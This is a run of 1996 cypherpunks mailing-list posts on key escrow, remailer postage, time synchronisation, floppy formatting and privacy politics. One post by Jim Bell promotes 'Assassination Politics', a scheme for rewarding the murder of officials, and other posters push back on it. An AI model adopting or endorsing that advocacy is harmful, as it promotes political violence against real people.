iQCVAwUBMQmiWo3DXUbM57SdAQEHMwQAoKZp0z7vEEGc9tPaXHfjcWGTu5kX4ImD
xMCcOvZK73GSPzqLhHGi0fiC41mGi9tueCpqVDyzoSSrzhqxE9xepUw+LFU2sypJ
KOMAVxC3AcKcRLru8Qb0WBTSZqtzvWxGBrBUq3xRnMt5FUz/RqDKtsOb2iC2F6gI
PlLmhki4wvI=
=KKyf
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Miszewski <crypto@midex.com>
Date: Sat, 27 Jan 1996 05:24:06 +0800
To: ecarp@netcom.com
Subject: Re: Bernie S. Sentencing
In-Reply-To: <199601260132.UAA05720@dal1820.computek.net>
Message-ID: <Pine.3.89.9601261954.C3536-0100000@shaq.midex.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Jan 1996, Ed Carp, KHIJOL SysAdmin wrote:

(snip)
> The last thing one of the "suits" said was something like "they know 
> about the hole in RSA we found with the quantum computer" - or that's 
> what was reportedly said.  Something like that.

The AP line came down that the matchbook contained the algorithm for 
easily factoring large primes.  Apparently the drunken stupor that Tim 
and Perry were in dislodged a blocking mechanism in each others brains 
and the answer appeared to them.  Perry, being the wit he is, quickly 
jotted down the relevant material.

The suits were reportedly affiliated with a little known 
group called "CypherDietyPunks". 

Matt

> --
> Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
> 					214/993-3935 voicemail/digital pager
> 					800/558-3408 SkyPager
> Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
> 
> "Past the wounds of childhood, past the fallen dreams and the broken families,
> through the hurt and the loss and the agony only the night ever hears, is a
> waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
> asks only one thing of you ... 'Remember who it is you really are.'"
> 
>                     -- "Losing Your Mind", Karen Alexander and Rick Boyes
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tim@dierks.org (Tim Dierks)
Date: Sat, 27 Jan 1996 12:47:09 +0800
To: cypherpunks@toad.com
Subject: Re: The French do some things right...
Message-ID: <v02140b00ad2f5584eb75@[205.149.165.24]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:01 PM 1/26/96, Timothy C. May wrote:
>The French seem to have partially done this. Francois Mitterand had a
>mistress? Who cares? They take it for granted that people are people, with
>human foibles and weaknesses.

Of course, aside from censoring photos and a book that happened to talk
about the fact that he had cancer. I think it's just a different set of
sensitivites.

 - Tim

Tim Dierks - Software Haruspex - tim@dierks.org
If you can't lick 'em, stick 'em on with a big piece of tape. - Negativland






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 27 Jan 1996 13:07:08 +0800
To: cypherpunks@toad.com
Subject: Anonymous trashing of Assassination Politics
Message-ID: <m0tg2Hl-0008zLC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[on cypherpunks@toad.com]

At 01:54 AM 1/27/96 +0100, Anonymous wrote:
>Jim Bell writes:
>
>>While this would normally be my cue to offer up my "Assassination Politics"
>>idea, which (if presumed to be correct) would stabilize "anarchy" and
>>prevent "lawlessness and social disorder" (at least as normally seen by the
>>average reader) I think that under the circumstances that would be redundant
>>here.
>
>I'm not *sure* that your Assassination Politics trip is the worst piece of 
tripe I've ever seen on the list, but if it's not, it's right up there.

I notice that you responded through an anonymous remailer, and didn't even 
use a nym.  This is strange.  If anything, the people who criticize my idea 
seem to be under the illusion that it is _I_ who should be embarrassed for 
proposing it, and in fact vociferously promoting it.  "Those of you" who 
object to it should be the ones who are "proudly" taking the "moral high 
ground" and thus should be happy to identify yourself and defend your position.

Even if, arguably, you invented the fiction that you feared for  your life 
trying to argue with people like me, nothing prevents you from developing a 
stable nym and arguing your position using it, secure in the knowledge that 
your body is safe from attack.  Your arguments would still be subject to 
sudden death, however.

>Those of us who are anarchists

What?!?  You imply that you are an anarchist, yet you don't approve of a 
system which might not only produce anarchy, but in fact in record time?  
Well, EXCUUUUUUUUSE MEEEEEE!  Sorry to put you out of a "job."

> are often that way because we think the *means* the State uses are evil, 
not to be excused by any amount of >mumbo-jumbo.

I think the state's ENDS are evil, too, not merely their MEANS.

>  And you gleefully propose to let us *all* in on the immoral game of 
murdering those who annoy us >sufficiently.

Actually, if you followed my arguments carefully, you will notice that my 
position is most accurately described by pointing out that I _could_not_ 
keep you from participating in this "immoral game", even if I wanted to.

For the record, I suspect some people who are total pacifists view the rest 
of us, those willing use use violence to defend ourselves, as "immoral."

>I'll pass.

Others won't.

>
>You know, if I were constructing an agent provacateur, I'd want a persona 
who's willing to be loudly clueless with ideas that show minimal or 
non-existent awareness of basic human hopes and fears, like security from 
random hit-squads.  I'd have him go on and on with his ideas, until 
eventually they can splashed all over headlines and used to discredit the 
whole realm of privacy protection.

Aha!  You're implying (actually, implying is an understatement here) that I 
am an "agent provocateur."  Naturally, it would be useless to deny this 
(although, for the record, I will deny it), because anybody who was 
convinced of its truth wouldn't expect me to tell the truth anyway.

But hey, let's put it up for a vote.  How many people out there believe that 
I am an "agent provocateur"?  C'mon people, don't be shy, you've seen my 
prose.  What do the rest of you think?


>But no, I don't think you're an agent.

Good!  I'd hate to argue with a person who didn't realize I am SERIOUS.

>  More fool you, you're willing to do the government's disinformation work 
for it without even thirty pieces >of silver or a 401K.

To be perfectly honest, I did a lot of soul-searching in early 1995 about 
whether I should publicize my ideas.  No, it wasn't because I was AFRAID 
that it might happen.  I _WANTED_ it to happen.  Every little bit.  Every 
government on the face of the earth, to come crashing down in a heap.  
Complete, total, absolute anarchy.  (But not the "anarchy" that most people 
are pre-programmed to think of...)  No more governments, no more borders, no 
more taxes, no more holocausts, no more wars, no more politicians.  Forever 
and ever and ever.  

Rather, I was fearful that by publicizing the idea, I might end up 
PREVENTING it from occurring.  You know, by giving the governments advance 
warning about what was going to happen, I might actually help them prevent it.

That worried me, a lot.  But eventually, I made my decision. After a huge 
amount of thought that some day I might be inclined to relate.  However, if 
I'd REALLY wanted to PREVENT this, I would have alerted the government 
secretly, so that they could manipulate things behind the scenes, secretly, 
to prevent this "crypto/digicash/internet anarchy."   _That_ I did not do.  
I publicized it, allowed it to be criticized and therefore "perfected" (not 
that it's "perfect, by any means!) it, and I'm now promoting it the best way 
I know how.  And with all due modesty, it's getting a pretty good reception, 
considering how extreme and drastic it initially might appear.

Part of my reasoning was that unless I engaged in the absurd conceit of 
believing that I was, cumulatively, smarter than everyone currently in the 
government, I had no choice but to conclude that the government was already 
aware of the potential problem.  And if that were the case, they were, at 
that very moment, working desperately to PREVENT what I wanted, desperately, 
to ACHIEVE.

At that point, I made the choice of forcing the government's hand.


>At this point I recommend to you the 12-step program I explained to Vladimir.
>
>Signed,
>A Friend

Recommendation:  If you really want to be taken seriously, use your real 
name or at the very least generate a stable nym.  Preferably, with messages 
signed by the nym's public key.   Without it, you are a silly, unbelieveable 
ass.  Even with it, you may STILL be a silly, unbelieveable ass, but at 
least people would pay more attention to you.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQmqKPqHVDBboB2dAQGW6wP/Vjrmoj16SaBZwvoUa8Sxx3VLJTKEwxLx
LOCs2zIl+Ahwr3R6IMw4y6VsESszYUz+271k1+rVVDf3GrxvlqJFyTRL2KeFltp2
fWosOD03X3Yneg8Ocg6oainIiiG+TLUkTqarddT+6VIoImmmWsFk4Yf+eG0OoEJc
NgawkFoSokg=
=Xs7A
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 27 Jan 1996 10:24:28 +0800
To: frissell@panix.com (Duncan Frissell)
Subject: Re: Denning's Crypto Archy [LONG]
In-Reply-To: <2.2.32.19960126214239.006ca3fc@panix.com>
Message-ID: <199601270136.UAA12571@homeport.org>
MIME-Version: 1.0
Content-Type: text



Interesting reply, Duncan.  Since you've addressed many of the points,
I'll just add a few short points.

Duncan Frissell wrote:

|                          The Future of Cryptography
| 
|                              Dorothy E. Denning
|                             Georgetown University
| 
|                             Revised January 6, 1996
| 
|                [Responses by Duncan Frissell in square brackets]

| A growing number of people are attracted to the market liberalism envisioned
| by Jefferson, Hayek, and many others, but not to anarchy. Thus, the crypto
| anarchists' claims come close to asserting that the technology will take us
| to an outcome that most of us would not choose.
| 
| [Still up for negotiation is how liberal a market we will want.  The growing
| power of markets and (traditional) liberal ideas is the result of the

	The term "crypto anarchy" is a label for a new, and still
evolving school of thought.  To take it to soley encompass anarchy as
a result would be as false as assuming that Utilitarians only take
utility in its restired sense, and not pleasure into thier
calculations.  Mill, in the first paragraph of chapter II of
'Utilitarianism' discusses the idea, that an idea, through its
simple label, is dismissed.

| This is the claim that I want to address here. I do not accept crypto
| anarchy as the inevitable outcome. A new paradigm of cryptography, key
| escrow, is emerging and gaining acceptance in industry.

	I would argue that it lacks industry acceptance, and the only
acceptance is that of the lesser of evils, not a warm embrace.

	Futher, the idea that unfettered cryptography will lead to the
end of the nation state, while embraced by both Denning and Frissel,
is not obvious.  There are many aspects of police work which will be
continued, and continue to address many of the crimes that worry Dr.
Denning.  Undercover cops can partake in a grey or black market more
easily when the tools of anonymity are available to all.  If the
market is for physical items, those items must be delivered.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 27 Jan 1996 10:21:53 +0800
To: abostick@netcom.com (Alan Bostick)
Subject: Re: More thoughts about digital postage (was Re: Digital postage and remailer abuse)
In-Reply-To: <T67Ax8m9LMNe085yn@netcom.com>
Message-ID: <199601270143.UAA12629@homeport.org>
MIME-Version: 1.0
Content-Type: text


Alan Bostick wrote:

| People asked in earlier in this thread how remailers could issue digital
| postage stamps without being able to know who is using which stamp issued.
| 
| One obvious approach is to use blind signatures.  Rather than issuing
| a stamp to the user who requests/purchases it, the user could send
| an unsigned stamp, encrypted in an RSA envelope, to the remailer.  The
| remailer would then blind-sign the envelope and return it to the user.
| The user then decrypts the envelope and has a stamp ready for use.

This is a lot of public key work for the remailer.

Take a look at Shamir's Micromint scheme, and sell coins for ecash on
the web.  Micromint coins are easy to verify, and thus could be resold
on peoples web pages.  They do have expiry dates though.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 28 Jan 1996 03:23:18 +0800
To: cypherpunks@toad.com
Subject: The French do some things right...
Message-ID: <ad2edc7e2002100496f8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:41 PM 1/26/96, David Mandl wrote:

>As has been pointed out here before, a lot of people are going to be
>getting in trouble for things they posted to obscure newsgroups or mailing
>lists four years ago.  How do I make sure that I get credit for something
>I've posted, but avoid the Alta Vista police?  There are a few feeble
>solutions, like:

One thing I have been hoping for as America's scandal-fixated society asks
whether Bill inhaled, whether Rush has a mistress, whether Madonna's
grandmother is really shacked up with a 19-year-old musician...one thing I
have been hoping for is that the American public will say "Enough!"

Not that they will call for the ban of tools like Alta Vista, or a law
against using one's past posts to alt.sex.barney as a consideration during
hiring, but that people will just wake up to the triviality of it all.

The French seem to have partially done this. Francois Mitterand had a
mistress? Who cares? They take it for granted that people are people, with
human foibles and weaknesses.

The way the U.S. public and/or the media machine is devouring political
candidates for minor transgressions, the blander are our candidates.

Could this happen, could people get beyond the minor transgressions and
foibles and just shrug off the petty scandals that seem to be fodder for
"daytime t.v."? Maybe.

And with search engines digging up "controversial" posts from the past,
some amount of shrugging is probably better than using some ancient post to
veto the hiring of a mostly-qualified candidate. (Again, I would never
support a law banning the browsing of one's past public record, but I would
say that wise businesses will appropriate discount such records.)

It's rare that I have something positive to say about the French, so this
is my rare tip 'o the hat to them.

--Tim


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 27 Jan 1996 10:54:00 +0800
To: cypherpunks@toad.com
Subject: Edited Edupage
Message-ID: <01I0HAOP4B58A0UOQG@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"educom@elanor.oit.unc.edu" 25-JAN-1996 23:36:37.75
Subj:	Edupage, 25 January 1996

>*****************************************************************
Edupage, 25 January 1996.  Edupage, a summary of news items on information
technology, is provided three times each week as a service by Educom,
a Washington, D.C.-based consortium of leading colleges and universities
seeking to transform education through the use of information technology.
*****************************************************************

INSECURITY FEARS
A North American study on Internet security by Ernst & Young says that
companies fear doing business via the Internet.  Companies with a direct
Internet connection are concerned that outsiders can gain access to their
systems and data bases, and companies that transmit sensitive financial
information worry about the security of these transactions.   (Toronto Globe
& Mail 25 Jan 96 B5)
--------------------
	If they're actually seriously becoming paranoid about this, it's an
opportunity to press cryptography. Anyone seen the original study?
--------------------

>TELECOM "GIVEAWAY" CONTROVERSY MAY BE DEFERRED
Senate Commerce Committee chair Larry Pressler (R., SD) is suggesting that a
controversial provision of the telecommunications legislation be removed
from that legislation and addressed in a separate bill.  The provision has
been attacked by Senator Bob Dole and other Republicans as a "giveaway" of
valuable airwaive spectrum to TV broadcasters for uses such as
high-definition television.  (New York Times 25 Jan 96 C6)
---------------------
	Looks like another anti-"CDA" campaign may soon be neccessary.
	-Allen
---------------------

Edupage is written by John Gehl (gehl@educom.edu) & Suzanne Douglas
(douglas@educom.edu).  Voice:  404-371-1853, Fax: 404-371-8057.  

***************************************************************
EDUPAGE is what you've just finished reading.  (Please note that it's
"Edupage" and not "EduPage.")  To subscribe to Edupage: send a message to:
listproc@educom.unc.edu and in the body of the message type: subscribe
edupage John Lewis (assuming that your name is John Lewis;  if it's not,
substitute your own name).  ...  To cancel, send a message to:
listproc@educom.unc.edu and in the body of the message type: unsubscribe
edupage.   (Subscription problems?  Send mail to educom@educom.unc.edu.)

ARCHIVES & TRANSLATIONS. For archive copies of Edupage or Update, ftp or
gopher to educom.edu or see URL: < http://www.educom.edu/>.   For the French
edition of Edupage, send mail to edupage-fr@ijs.com with the subject
"subscribe";  or see <  http://www.ijs.com  >.  For the German edition,
genugt eine E-Mail an:  infomat@stern.de mit der Betreff- oder Textzeile
"STERN Online Edupage".  For the Hebrew edition, send mail to
listserv@kinetica.co.il containing : SUBSCRIBE Leketnet-Word6 <name> or see
< http://www.kinetica.co.il/newsletters/leketnet/ >.  For the Hungarian
edition, send mail to:  send mail to subs.edupage@hungary.com.  For the
Italian edition :  < http://dbweb.agora.stm.it/webforum/infotech > or send
mail to: b.parrella@agora.stm.it. for info.   For the Portuguese edition,
contact edunews@nc-rj.rnp.br with the message SUB EDUPAGE-P Seu Primeiro
Nome Seu Sobrenome. For the Spanish edition, send mail edunews@nc-rj.rnp.br
with the message SUB EDUPAGE-E Su Primer Nombre, Su Apellido. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stephen_albert@alpha.c2.org (Stephen Albert)
Date: Mon, 29 Jan 1996 00:53:29 +0800
To: cypherpunks@toad.com
Subject: Open NNTP servers and logging
Message-ID: <199601270511.VAA14254@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

A little while back there were some very helpful posts about getting started wit
open NNTP servers.  Since my regular site runs kinda slow in the news department
I've been having fun poking around and seeing about getting more current.

Then it dawned on me.  People keep logs.  Presumably routine logging would point
right back at my ISP, and from there it'd be not too hard to pin down me 
specifically.  No, I don't think anyone is particularly *likely* to do that, but
why take chances?

So...anyone know of open NNTP servers that *don't* keep logs?  Or some other way
around the problem?

Thanks!

Stephen "extra! extra! read all about it!" Albert
stephen_albert@alpha.c2.org <*> PGP key on request and on servers



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMQYTNEimCtQtWVIdAQG/rQf/SnfVuv+fopypvTwKH9dm/4YPvwsgOjCG
5TBe0/wctyzVOEHoXiP3J/wagLrrvsuy8Xb3bRDWvJA+JoP5GOVh9RYG86ROG4Lf
NIh1jKWG/FYotBYDclhROzv6+Fm4+7JXrbdVdPUTq5WwIHrmHeTMdkHv58WcJzOs
PEvrpFUmTPswkIZbdyzrCz4P3GxsoUtu79Fe3QZNO83Jdwy8sIWFwGDvGq+WhJ3T
8/FLbJ2HLLqrXYYM4KYUSLShGvFyFqf/inZ9Ajbnx0p1hEXqR+/XZzyROEBdJWvJ
PAIJA6ZiEeLeTXWD0jH1XlMElKAD7QYeJ2p9OcwhHabtEvgf7uIxSQ==
=q/sb
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 27 Jan 1996 14:10:11 +0800
To: Thomas Grant Edwards <cypherpunks@toad.com
Subject: Re: Denning's misleading statements
Message-ID: <m0tg2xB-0008zgC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:24 PM 1/26/96 -0500, Thomas Grant Edwards wrote:
>
>I think the big bait-and-switch is her description of the various 
>companies falling over themselves to get to _VOLUNTARY_ key escrow to 
>avoid losing data and protecting themselves against employee problems 
>versus _MANDATORY_GOVERNMENT_ key escrow to ensure that individuals 
>cannot hide information from the government.
>
>Key escrow is good.  Key escrow against your will is bad.

While I understand your point, I sorta hafta disagree.  (or, at least, state 
my reservations.)

If something is technologically IMPOSSIBLE (or, in practice, not available), 
it won't be mandated by government because it can't be.  The moment 
something exists, it can be forced on people.

I'm not saying we should somehow try to prevent people from developing truly 
voluntary key-escrow systems; rather, I'm saying that their existence should 
alert us to the danger.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 27 Jan 1996 11:01:06 +0800
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <Pine.SUN.3.91.960126103914.25000B-100000@rwd.goucher.edu>
Message-ID: <Pine.SV4.3.91.960126211149.24886C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



> In fact, before FDR, wage income was taxed; however, it was one large 
> check at the end of the yeraar (or the beginning of the next, really).

  I think this wrong. Read the definition of "income" before the WWII. 
Wages were considered to be an equal exchange for labor services 
rendered, not a "gain" (income).


> The high cost of WW II made it a necessity for the gvm't to have more 
> money at a particular moment, and not wait for year-end.

    Not so. Govt has been able to print fiat money at will since the Fed 
Reserve was founded in 1913.




> the income tax was passed; however, the income tax (and wage income was 
> most certainly taxed) was AFAIK implemented by the end of the 19th century.

     That income tax was overthrown by the Supreme Court as not being 
apportioned amongst the states, as required by the Constitution.

     Technically, the income tax is an excise, not a tax. They aren't the 
same.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@utopia.hacktic.nl>
Date: Sat, 27 Jan 1996 07:11:33 +0800
To: cypherpunks@toad.com
Subject: Re: OFFSHORE RESOURCES
Message-ID: <199601262017.VAA28266@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


You sez:

: There has been sporadic interest on this list with regard to
: offshore incorporation, banking, etc.  While ads for offshore
: services are common in the international press, until now, none
: of these companies has an Internet presence.  

: THE ECONOMIST has an ad for OCRA, a group that specializes in
: offshore company services.  What's new is that they have a Web
: page.  It includes a good primer on the benifits from going 
: offshore and on selected offshore jurisdictions.  I've never done
: business with these folks, but they have good info.

I maintain a small page with offshore resources at:

	URL: http://www.replay.com/offshore

 bEST Regards,
  -AJ-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Grant, M.A. (Oxon)" <mark@unicorn.com>
Date: Sat, 27 Jan 1996 07:54:11 +0800
To: cypherpunks@toad.com
Subject: Re: Doctor Denning
Message-ID: <Pine.3.89.9601262127.A22900-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 26 Jan 1996, Peter Monta wrote:

> It seemed to boil
> down to the vacuous "if everyone could just agree that key
> escrow is a good thing, there would be no problem".

Actually, I think that's "if everyone could just agree that key escrow is
a good thing, there would be no problem. And if they don't, then we'll
just ban everything else..." 

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 27 Jan 1996 13:40:00 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Crypto Exports, Europe, and Conspiracy Theories
In-Reply-To: <ad2e6b6f1a02100406fa@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.960126211645.3530A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 26 Jan 1996, Timothy C. May wrote:
> 
> A minor correction. Tim Berners-Lee is British, and was only working at
> CERN, which effectively straddles the French-Swiss border, near Geneva. And
> he is now, or was recently, working in New York. I would have a hard time

Actually, MIT is usually placed in Cambridge, Mass. (though the W3O also 
has a branch at Inria - Sophia Antipolis. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Townsend <townsend@smokin.fly.net>
Date: Sat, 27 Jan 1996 11:22:10 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Time codes for PCs (fromn German Banking)
In-Reply-To: <m0tfyb0-00090XC@pacifier.com>
Message-ID: <Pine.LNX.3.91.960126211247.12031A-100000@smokin.fly.net>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 26 Jan 1996, jim bell wrote:

> (BTW, if anybody knows how to easily connect it to the pc, or has the 
> appropriate software, please tell me  The task isn't difficult from a 
> hardware standpoint; it's just RS-232 serial ASCII timecode at about 9600
> bps which 
> either continuously retransmits or on request.  The problem is the software: 
>  How, exactly, do I INTERFACE such a serial input to the existing computer/RTC 
> combination? (Don't tell me to plug it into an unused serial jack!  I'm not 
> stupid. I'm not a  programmer, and I don't play one on TV! (I know 
> gates, flops, op amps, A/D, D/A, microprocessor hardware design, even some 
> Z-80 assy language, RF,  and I've programmed in Fortran, Basic, APL, Algol, 
> PL/1, Pascal, LISP, but not recently and I don't enjoy it!)

You'll probably want to look at the XNTP code at

ftp://louie.udel.edu/pub/ntp

There's plenty of good toys and code for time geeks, radio clock
info, etc.

-cpt
townsend@fly.net








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 27 Jan 1996 12:37:59 +0800
To: cypherpunks@toad.com
Subject: Re: Wipe Swap File
In-Reply-To: <m0teD3N-00090UC@pacifier.com>
Message-ID: <FucciD58w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


(This came in on Sunday and I mislaid it, sorry)

jim bell <jimbell@pacifier.com> writes:
> >Jim Bell mentioned the trick of hiding information into 'extra' tracks and
> >sectors not used by the usual DOS formatting. It's very old too.
>
> Actually, I think it wasn't really used initially for "data hiding"
> purposes.  I'm talking about the early days of CP/M and other such systems,
> circa 1977 and such, when individuals "discovered" that floppy drives had no
> hard mechanical stop past the "last" good track, and they "stole" a few
> percent of extra capacity from a floppy by simply ignoring the recommended
> "last" track.  Naturally, it would work okay on some drives but not on
> others... which is why it was a bad idea.

All the 360K 5.25" drives I've ever tried were capable of going to track 43
reliably (regular PC DOS format used 40). But I've come across too many
1.44/3.5" drvies that don't go beyond 80. Can't count on it. However...

> In addition, I also discovered that it was possible to put a few more than
> 26 sectors on each track of an 8" single-density (240 kilobytes!) floppy
> disk.  The main problem with using
> these "tricks" is that the floppy had no method of conveying formatting
> information to the system it was in, which meant that any floppy using this
> trick was by definition non-standard.  ("feature" or "bug" depending on your
> goal...)

It's possible to squeeze more sectors on 5.25" and 3.5" disks too, especially
if you specify shorter gaps. It's also possible to vary sector size.

When I read the above paragraph, I thought momentarily: it takes A LOT of bytes
to specify the format of a floppy disk. Could one use this as a kind of
encryption? I.e., the key would be the format specs, and it would have to
be supplied to the device driver before it could read the actual data from
the floppy. Unfortunately, I think a clever analysis of the disk with just
the regular FDC can tell you a lot about the formatting (i.e., the number and
the size of the sectors, and even their physical order).

> I started building my own 12.5 MHz Z-80 -based CP/M system in 1978, fully
> designed and wire-wrapped by myself, and wrote my own BIOS.  (Used a WDC
> 1791 FDC)  Had total
> control.  I didn't try this trick even then because of compatibility
> reasons, but one thing I _DID_ do was to write a floppy formatter that
> "undid" the 6-sector skewing that standard CP/M had to do to keep up with
> the data read/write. (in other words, I physically re-skewed the sector
> numbering to make the next "desired" sector come faster...) I ended up with a
> effective skew-factor of 2.  Even a skew factor of 1 worked on my system (no
> skew at all), but the problem was that when I gave the most extreme of these
> oddly skewed floppies to my friends with 8" floppies, they took A LONG TIME
> to read the data!  (Their systems always missed the next sector because their
> systems were too slow, so they only ended up being able to read one sector
> per disk rotation.)

This is extremely cool indeed.

Trivia question: is it true that the reason why a lot of hard disks have
a prime number of sectors per track (like 17) so that you can use different
interleave factors (which have to be relatively prime to the # of sectors)?

> All this helps to explain why I asked if PGP had ever been ported to CP/M.
> Nostalgia!

Only a few weeks ago I gave away a NEC V20 motherboard capable of running CP/M.
(I recall running CP/M on it at some point. Of course, its main purpose was
being an 8088 clone.) Why not. :-)

It would be even cooler to port PGP to BESM-6. (How many people on this
list have ever used a BESM-6?)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Sat, 27 Jan 1996 11:16:04 +0800
To: cypherpunks@toad.com
Subject: FWD: Internet e-mail
Message-ID: <9601270226.AA18376@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The following was posted to another list.  Has anybody heard about this?
[Gee, I _wonder_ if there will be escrowed keys...]

******Begin Forwarded Message*********
>I just read in "legal.online" that the Postal Service plans to provide
>secure email service.  It will include encryption plus offer U.S. mail fraud
>protection.  Of course there is no estimate on cost.


Regards -
Lynne


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQmOdj5A4+Z4Wnt9AQGKQQP+KRNFsI7DMk6nJwmWDpZkdX1RAtvJRdMo
38YL44AW4KxMO7SJdtkdAUhmWI6Y6bkWQ1+YXuRkG6wVN724k30vSui5vqO88GNF
0lvXyuJmL0z76yGbZmwf2l06L767MAX6P4hXuaMP67VZ5VRwScoNhlmPnb5L50rD
v2ZLWyC0Rvw=
=lhVA
-----END PGP SIGNATURE-----


*******************************************************
Lynne L. Harrison, Esq.   |     "The key to life:
Poughkeepsie, New York    |      - Get up;
E-mail:                   |      - Survive;
lharrison@mhv.net         |      - Go to bed."
*******************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 29 Jan 1996 00:51:05 +0800
To: Chris Townsend <townsend@smokin.fly.net>
Subject: Re: Time codes for PCs (fromn German Banking)
In-Reply-To: <Pine.LNX.3.91.960126211247.12031A-100000@smokin.fly.net>
Message-ID: <Pine.SOL.3.91.960126213154.3530B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 26 Jan 1996, Chris Townsend wrote:

> There's plenty of good toys and code for time geeks, radio clock
> info, etc.
> 

Talking about which... anybody know of any fuzzballs that are set to be 
junked? It'd be cool to take a fuzzball and get IPV6 w/IPSEC running. 
Wouldn't like to run an OC12 through it though.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 27 Jan 1996 11:20:56 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Time codes for PCs (fromn German Banking)
In-Reply-To: <m0tfyb0-00090XC@pacifier.com>
Message-ID: <Pine.SV4.3.91.960126213314.24886H-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


You are laboring under false ipression if you think it is easy to keep 
synched to an outside source to closer than, say, a millisecond. It isn't 
a turnkey deal. Cesium-beam clocks and GPS constellations notwithstanding.

Alan Horowitz
alanh@norfolk.infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 27 Jan 1996 14:17:02 +0800
To: jim bell <dnowch2@teleport.com
Subject: Re: Anonymous trashing of Assassination Politics
In-Reply-To: <m0tg2Hl-0008zLC@pacifier.com>
Message-ID: <Pine.ULT.3.91.960126213003.19154J-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 26 Jan 1996, jim bell wrote:

[Stuff]

Where is this opus of yours on the new political order? On Dejanews, I 
found only people ridiculing you. Searching the Web for Jim Bell, I found 
only an environmentalist with entirely different delusions of grandeur.
Searching for Klaatu, I found only a bad science fiction movie. And you 
know that the older cypherpunk archives aren't so well maintained.

Could you please post a URL? I really don't think you need to send the
whole thing to the list again, but such an important innovation in
political theory should certainly be shared with the world. I mean, after 
years on FidoNet, talking to *a dozen* people who disagree with you, you 
must have a lot to contribute.

